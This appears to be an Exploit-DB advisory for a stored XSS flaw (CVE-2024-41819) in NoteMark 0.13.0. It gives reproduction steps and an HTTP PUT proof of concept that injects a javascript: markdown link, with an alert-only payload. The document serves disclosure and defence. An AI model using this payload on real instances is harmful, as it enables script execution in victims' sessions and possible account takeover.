Stored Cross-Site Scripting (XSS) in NoteMark

vendor:

NoteMark

by:

Alessio Romano (sfoffo)

6.1

CVSS

HIGH

Stored Cross-Site Scripting (XSS)

CWE

Product Name: NoteMark

Affected Version From: 0.13.0

Affected Version To: 0.13.0 and below

Patch Exists: NO

Related CWE: CVE-2024-41819

CPE: cpe: /a:enchantedcode: notemark: 0.13.0

Metasploit:

Other Scripts:

Platforms Tested: Linux

2024

Stored Cross-Site Scripting (XSS) in NoteMark

The vulnerability exists in NoteMark version 0.13.0 and below. By injecting a malicious payload into a note and rendering it using the 'Rendered' tab, an attacker can execute arbitrary JavaScript code in the context of the user's session.

Mitigation:

To mitigate this vulnerability, input validation and output encoding should be implemented to prevent the execution of scripts from user inputs.

Source

Exploit-DB raw data:

# Exploit Title: Stored XSS in NoteMark
# Date: 07/29/2024
# Exploit Author: Alessio Romano (sfoffo)
# Vendor Homepage: https://notemark.docs.enchantedcode.co.uk/
# Version: 0.13.0 and below
# Tested on: Linux
# References:
https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-41819,
https://github.com/enchant97/note-mark/commit/a0997facb82f85bfb8c0d497606d89e7d150e182,
https://github.com/enchant97/note-mark/security/advisories/GHSA-rm48-9mqf-8jc3
# CVE: CVE-2024-41819

## Steps to Reproduce
1. Log in to the application.
2. Create a new note or enter a previously created note.
3. Access the note editor functionality from the selected note by clicking
on the "Editor" tab.
4. Input the following payload:
[xss-link](javascript:alert(1))
5. Save the changes.
6. Click on the "Rendered" tab to view the rendered markdown version of the
note. Click on the previously created link to pop the injected alert.

## HTTP Request PoC

PUT /api/notes/<note-uuid>/content HTTP/1.1
Host: localhost:8000
Accept: */*
Content-Type: text/plain;charset=UTF-8
Content-Length: 34
Sec-Fetch-Site: same-origin
Authorization: Bearer <TOKEN>


[xss-link](javascript:alert(1))